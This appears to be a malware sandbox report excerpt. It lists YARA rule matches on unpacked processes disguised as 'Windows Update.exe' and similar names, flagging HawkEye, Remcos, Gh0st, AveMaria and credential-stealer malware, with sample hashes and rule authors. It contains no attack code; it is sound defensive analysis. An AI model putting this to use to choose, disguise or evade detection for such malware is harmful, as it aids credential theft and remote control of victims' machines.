                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.41b62f.11.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.27bb310.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.3.xxTzyGLZx5.exe.7abf78.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
